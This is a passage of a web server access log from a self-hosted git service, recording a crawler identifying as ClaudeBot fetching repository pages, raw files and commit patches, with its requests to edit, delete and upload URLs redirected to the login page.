-[15/Feb/2026:09:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/global.json" [Client 216.73.216.188] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs?display=source" [Client 216.73.216.188] [Length 14183] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/static" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/updateRecord.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/static" -[15/Feb/2026:09:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/Program.cs" [Client 216.73.216.188] [Length 893] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/updateRecord.md" -[15/Feb/2026:09:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 216.73.216.188] [Length 11478] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/global.json" [Client 216.73.216.188] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" [Client 216.73.216.188] [Length 16004] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/main.py" -[15/Feb/2026:09:30:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/index.html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/types.ts" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/index.html" -[15/Feb/2026:09:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47.patch" [Client 216.73.216.188] [Length 130059] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 216.73.216.188] [Length 7503] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/types.ts" -[15/Feb/2026:09:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 216.73.216.188] [Length 10261] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/Program.cs" [Client 216.73.216.188] [Length 2209] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/status.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/status.json" -[15/Feb/2026:09:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 12540] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj" -[15/Feb/2026:09:30:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/app" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:16 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/js/i18n.js" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/main.py" -[15/Feb/2026:09:30:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/app" -[15/Feb/2026:09:30:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components" -[15/Feb/2026:09:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47.diff" [Client 216.73.216.188] [Length 128259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/Dockerfile" -[15/Feb/2026:09:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 13252] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/types.ts" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/types.ts" -[15/Feb/2026:09:30:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/services" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/Dockerfile" -[15/Feb/2026:09:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/docker-compose.yml" -[15/Feb/2026:09:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug" [Client 216.73.216.188] [Length 9851] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/status.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/services" -[15/Feb/2026:09:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/status.json" -[15/Feb/2026:09:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/import_csv.py" -[15/Feb/2026:09:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService" -[15/Feb/2026:09:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 216.73.216.188] [Length 11754] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/metadata.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/docker-compose.yml" -[15/Feb/2026:09:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/metadata.json" -[15/Feb/2026:09:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 216.73.216.188] [Length 9815] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/import_csv.py" -[15/Feb/2026:09:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj?display=source" [Client 216.73.216.188] [Length 11772] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/metadata.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/init_db.py" -[15/Feb/2026:09:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/metadata.json" -[15/Feb/2026:09:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 216.73.216.188] [Length 931] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static" -[15/Feb/2026:09:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 10358] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv" -[15/Feb/2026:09:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 216.73.216.188] [Length 459] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/package.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/init_db.py" -[15/Feb/2026:09:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" [Client 216.73.216.188] [Length 11469] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/obj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/package.json" -[15/Feb/2026:09:30:18 